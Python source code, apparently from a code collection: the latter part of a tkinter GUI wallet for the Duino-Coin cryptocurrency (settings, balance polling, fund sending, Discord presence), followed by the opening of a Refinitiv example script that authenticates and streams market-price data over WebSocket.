message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv().decode()
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv().decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv().decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if (
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0
and notificationsEnabled
):
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += str(row[1]) + \
" " + str(row[2]) + " DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ " "
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr)
+ "?",
icon="warning",)
if MsgBox == "yes":
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv().decode()
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
balanceLabel.grid(row=1,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
wbalanceLabel = Label(
master,
textvariable=wbalancetext,
font=textFont4,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
wbalanceLabel.grid(row=2,
column=0,
columnspan=3,
sticky=S + W,
padx=(5, 0))
balanceusdtext = StringVar()
balanceusdtext.set(get_string("please_wait"))
Label(
master,
textvariable=balanceusdtext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=1,
column=3,
sticky=S + E,
pady=(0, 1.5),
padx=(0, 5))
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=4,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5),
pady=(0, 5))
def clear_recipient_placeholder(self):
recipient.delete("0", "100")
def clear_amount_placeholder(self):
amount.delete("0", "100")
Label(
master,
text=get_string("recipient"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=0,
sticky=W + S,
padx=(5, 0))
recipient = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
recipient.grid(row=5,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
recipient.insert("0", "revox")
recipient.bind("<FocusIn>", clear_recipient_placeholder)
Label(
master,
text=get_string("amount"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=0,
sticky=W + S,
padx=(5, 0))
amount = Entry(
master,
border="0",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
amount.grid(row=6,
column=1,
sticky=N + W + S + E,
columnspan=3,
padx=(0, 5))
amount.insert("0", str(VERSION))
amount.bind("<FocusIn>", clear_amount_placeholder)
sendLabel = Button(
master,
text=get_string("send_funds"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
sendLabel.grid(
row=8,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5),
pady=(1, 2))
sendLabel.bind("<Button-1>", send_funds_protocol)
wrapLabel = Button(
master,
text=get_string("wrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=0,
sticky=N + S + E + W,
columnspan=2,
padx=(5, 1),
pady=(1, 5))
wrapLabel.bind("<Button-1>", wrapper_window)
wrapLabel = Button(
master,
text=get_string("unwrap_duco"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
wrapLabel.grid(
row=9,
column=2,
sticky=N + S + E + W,
columnspan=2,
padx=(1, 5),
pady=(1, 5))
wrapLabel.bind("<Button-1>", unwrapper_window)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=10,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=(5, 5))
Label(
master,
text=get_string("estimated_profit"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=11,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
sessionprofittext = StringVar()
sessionprofittext.set(get_string("please_wait_calculating"))
sessionProfitLabel = Label(
master,
textvariable=sessionprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
sessionProfitLabel.grid(
row=12,
column=0,
sticky=W,
columnspan=4,
padx=5)
minuteprofittext = StringVar()
minuteProfitLabel = Label(
master,
textvariable=minuteprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
minuteProfitLabel.grid(
row=13,
column=0,
sticky=W,
columnspan=4,
padx=5)
hourlyprofittext = StringVar()
hourlyProfitLabel = Label(
master,
textvariable=hourlyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
hourlyProfitLabel.grid(
row=14,
column=0,
sticky=W,
columnspan=4,
padx=5)
dailyprofittext = StringVar()
dailyprofittext.set("")
dailyProfitLabel = Label(
master,
textvariable=dailyprofittext,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
dailyProfitLabel.grid(
row=15,
column=0,
sticky=W,
columnspan=4,
padx=5)
separator = ttk.Separator(master, orient="horizontal")
separator.grid(
row=16,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5)
Label(
master,
text=get_string("local_transactions"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=17,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
transactionstext = StringVar()
transactionstext.set("")
transactionstextLabel = Label(
master,
textvariable=transactionstext,
font=TEXT_FONT,
justify=LEFT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionstextLabel.grid(
row=18,
column=0,
sticky=W,
columnspan=4,
padx=5,
pady=(0, 5))
separator = ttk.Separator(master,
orient="horizontal")
separator.grid(
row=19,
column=0,
sticky=N + S + E + W,
columnspan=4,
padx=5,
pady=(0, 10))
original = Image.open(resources + "transactions.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
transactions = ImageTk.PhotoImage(resized)
transactions.image = transactions
transactionsLabel = Label(
master,
image=transactions,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
transactionsLabel.grid(
row=20,
column=0,
sticky=N + S + W + E,
pady=(0, 5))
transactionsLabel.bind("<Button>", transactions_window)
original = Image.open(resources + "calculator.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
calculator = ImageTk.PhotoImage(resized)
calculator.image = calculator
calculatorLabel = Label(
master,
image=calculator,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
calculatorLabel.grid(
row=20,
column=1,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
calculatorLabel.bind("<Button>", currency_converter_window)
original = Image.open(resources + "stats.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
stats = ImageTk.PhotoImage(resized)
stats.image = stats
statsLabel = Label(
master,
image=stats,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
statsLabel.grid(
row=20,
column=2,
sticky=N + S + W + E,
padx=(0, 5),
pady=(0, 5))
statsLabel.bind("<Button>", statistics_window)
original = Image.open(resources + "settings.png")
resized = original.resize((58, 58), Image.ANTIALIAS)
settings = ImageTk.PhotoImage(resized)
settings.image = settings
settingsLabel = Label(
master,
image=settings,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
settingsLabel.grid(
row=20,
column=3,
sticky=N + S + W + E,
padx=(0, 10),
pady=(0, 5))
settingsLabel.bind("<Button>", settings_window)
root.iconphoto(True, PhotoImage(file=resources + "duco_color.png"))
start_balance = global_balance
curr_bal = start_balance
profit_calculator(start_balance)
update_balance_labels()
root.mainloop()
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed."
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"pypresence\".")
install("pypresence")
try:
from PIL import Image, ImageTk
except ModuleNotFoundError:
print("Pillow is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"Pillow\".")
install("Pillow")
try:
from notifypy import Notify
except ModuleNotFoundError:
print("Notify-py is not installed. "
+ "Continuing without notification system.")
notificationsEnabled = False
else:
notificationsEnabled = True
try:
from cryptography.fernet import Fernet, InvalidToken
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
except ModuleNotFoundError:
print("Cryptography is not installed. "
+ "Please manually install \"cryptography\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import secrets
except ModuleNotFoundError:
print("Secrets is not installed. "
+ "Please manually install \"secrets\"."
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
from base64 import urlsafe_b64decode as b64d
from base64 import urlsafe_b64encode as b64e
except ModuleNotFoundError:
print("Base64 is not installed. "
+ "Please manually install \"base64\""
+ "\nExiting in 15s.")
sleep(15)
_exit(1)
try:
import websocket
except ModuleNotFoundError:
print("websocket-client is not installed. "
+ "Wallet will try to install it. "
+ "If it fails, please manually install \"websocket-client\".")
install("websocket-client")
try:
import tronpy
from tronpy.keys import PrivateKey
TRONPY_ENABLED = True
except ModuleNotFoundError:
TRONPY_ENABLED = False
print("Tronpy is not installed. "
+ "Please manually install \"tronpy\" "
+ "if you intend on using wDUCO wrapper.")
else:
try:
tron = tronpy.Tron()
wduco = tron.get_contract("TWYaXdxA12JywrUdou3PFD1fvx2PWjqK9U")
except:
TRONPY_ENABLED = False
print("Tron-side error, disabling wrapper for this session")
if not path.exists(resources):
mkdir(resources)
with sqlconn(resources + "/wallet.db") as con:
cur = con.cursor()
cur.execute(
"""CREATE TABLE IF NOT EXISTS
Transactions(Date TEXT, amount REAL)""")
cur.execute(
"""CREATE TABLE IF NOT EXISTS
UserData(username TEXT, password TEXT, useWrapper TEXT)""")
con.commit()
if not Path(resources + "duco.png").is_file():
urlretrieve("https://i.imgur.com/9JzxR0B.png", resources + "duco.png")
if not Path(resources + "duco_color.png").is_file():
urlretrieve(
"https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/master/"
+ "Resources/duco.png?raw=true",
resources + "duco_color.png")
if not Path(resources + "calculator.png").is_file():
urlretrieve("https://i.imgur.com/iqE28Ej.png",
resources + "calculator.png")
if not Path(resources + "exchange.png").is_file():
urlretrieve("https://i.imgur.com/0qMtoZ7.png",
resources + "exchange.png")
if not Path(resources + "discord.png").is_file():
urlretrieve("https://i.imgur.com/LoctALa.png",
resources + "discord.png")
if not Path(resources + "github.png").is_file():
urlretrieve("https://i.imgur.com/PHEfWbl.png",
resources + "github.png")
if not Path(resources + "settings.png").is_file():
urlretrieve("https://i.imgur.com/NNEI4WL.png",
resources + "settings.png")
if not Path(resources + "transactions.png").is_file():
urlretrieve("https://i.imgur.com/nbVPlKk.png",
resources + "transactions.png")
if not Path(resources + "stats.png").is_file():
urlretrieve("https://i.imgur.com/KRfHZUM.png",
resources + "stats.png")
if not Path(resources + "langs.json").is_file():
urlretrieve(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "Wallet_langs.json",
resources + "langs.json")
# Load language strings depending on system locale
with open(resources + "langs.json", "r", encoding="utf-8") as lang_file:
lang_file = jsonloads(lang_file.read())
try:
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("bg"):
lang = "bulgarian"
elif locale.startswith("nl"):
lang = "dutch"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("uk"):
lang = "ukrainian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("sk"):
lang = "slovak"
elif locale.startswith("th"):
lang = "thai"
elif locale.startswith("ko"):
lang = "korean"
else:
lang = "english"
except IndexError:
lang = "english"
if __name__ == "__main__":
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count < 1:
root = Tk()
lf = LoginFrame(root)
root.mainloop()
cur = con.cursor()
cur.execute("SELECT COUNT(username) FROM UserData")
userdata_count = cur.fetchall()[0][0]
if userdata_count >= 1:
loading_window()
cur = con.cursor()
cur.execute("SELECT * FROM UserData")
userdata_query = cur.fetchone()
username = userdata_query[0]
passwordEnc = (userdata_query[1]).decode("utf-8")
password = b64decode(passwordEnc).decode("utf8")
status.config(text=get_string("preparing_wallet_window"))
loading.update()
try:
# Start duco price updater
get_duco_price()
get_balance()
init_rich_presence()
Thread(target=update_rich_presence).start()
try:
# Destroy loading dialog and start the main wallet window
loading.destroy()
except Exception:
pass
root = Tk()
my_gui = Wallet(root)
except Exception as e:
print(e)
_exit(0)
|
market_price_rdpgw_service_discovery.py
|
#!/usr/bin/env python
# |-----------------------------------------------------------------------------
# | This source code is provided under the Apache 2.0 license --
# | and is provided AS IS with no warranty or guarantee of fit for purpose. --
# | See the project's LICENSE.md for details. --
# | Copyright (C) 2018-2021 Refinitiv. All rights reserved. --
# |-----------------------------------------------------------------------------
"""
This example demonstrates authenticating via Refinitiv Data Platform, using an
authentication token to discover Refinitiv Real-Time service endpoint, and
using the endpoint and authentitcation to retrieve market content. Specifically,
for oAuthPasswordGrant authentication, this application uses password grant type
or refresh_token grant token in auth request to RDP (auth/oauth2/v1/token) using
Refintiv provided credentials: username (typically machine ID) and password. A
client id is generated by customers using the app-generator tool.
This example maintains a session by proactively renewing the authentication
token before expiration.
This example can run with optional hotstandby support. Without this support, the application
will use a load-balanced interface with two hosts behind the load balancer. With hot standly
support, the application will access two hosts and display the data (should be identical) from
each of the hosts.
It performs the following steps:
- Authenticating via HTTP Post request to Refinitiv Data Platform
- Retrieving service endpoints from Service Discovery via HTTP Get request,
using the token retrieved from Refinitiv Data Platform
- Opening a WebSocket (or two, if the --hotstandby option is specified) to
a Refinitiv Real-Time Service endpoint, as retrieved from Service Discovery
- Sending Login into the Real-Time Service using the token retrieved
from Refinitiv Data Platform.
- Requesting market-price content.
- Printing the response content.
- Periodically proactively re-authenticating to Refinitiv Data Platform, and
providing the updated token to the Real-Time endpoint before token expiration.
"""
import sys
import time
import getopt
import requests
import socket
import json
import websocket
import threading
# Global Default Variables
app_id = '256'
auth_url = 'https://api.refinitiv.com:443/auth/oauth2/v1/token'
discovery_url = 'https://api.refinitiv.com/streaming/pricing/v1/'
password = ''
newPassword = ''
position = ''
sts_token = ''
refresh_token = ''
user = ''
clientid = ''
client_secret = ''
scope = 'trapi.streaming.pricing.read'
region = 'us-east-1'
ric = '/TRI.N'
service = 'ELEKTRON_DD'
hostList = []
hotstandby = False
# Global Variables
session2 = None
original_expire_time = '0';
# Global Variables for Password Policy Description
PASSWORD_LENGTH_MASK = 0x1;
PASSWORD_UPPERCASE_LETTER_MASK = 0x2;
PASSWORD_LOWERCASE_LETTER_MASK = 0x4;
PASSWORD_DIGIT_MASK = 0x8;
PASSWORD_SPECIAL_CHARACTER_MASK = 0x10;
PASSWORD_INVALID_CHARACTER_MASK = 0x20;
PASSWORD_LENGTH_MIN = 30;
PASSWORD_UPPERCASE_LETTER_MIN = 1;
PASSWORD_LOWERCASE_LETTER_MIN = 1;
PASSWORD_DIGIT_MIN = 1;
PASSWORD_SPECIAL_CHARACTER_MIN = 1;
PASSWORD_SPECIAL_CHARACTER_SET = "~!@#$%^&*()-_=+[]{}|;:,.<>/?";
PASSWORD_MIN_NUMBER_OF_CATEGORIES = 3;
class WebSocketSession:
logged_in = False
session_name = ''
web_socket_app = None
web_socket_open = False
host = ''
disconnected_by_user = False
def __init__(self, name, host):
self.session_name = name
self.host = host
def _send_market_price_request(self, ric_name):
""" Create and send simple Market Price request """
mp_req_json = {
'ID': 2,
'Key': {
'Name': ric_name,
'Service': service
},
}
self.web_socket_app.send(json.dumps(mp_req_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def _send_login_request(self, auth_token, is_refresh_token):
"""
Send login request with authentication token.
Used both for the initial login and subsequent reissues to update the authentication token
"""
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'NameType': 'AuthnToken',
'Elements': {
'ApplicationId': '',
'Position': '',
'AuthenticationToken': ''
}
}
}
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
login_json['Key']['Elements']['AuthenticationToken'] = auth_token
# If the token is a refresh token, this is not our first login attempt; set no_refresh flag
if is_refresh_token:
login_json['Refresh'] = False
self.web_socket_app.send(json.dumps(login_json))
print("SENT on " + self.session_name + ":")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def _process_login_response(self, message_json):
""" Send item request """
if message_json['State']['Stream'] != "Open" or message_json['State']['Data'] != "Ok":
print("Login failed.")
sys.exit(1)
self.logged_in = True
self._send_market_price_request(ric)
def _process_message(self, message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
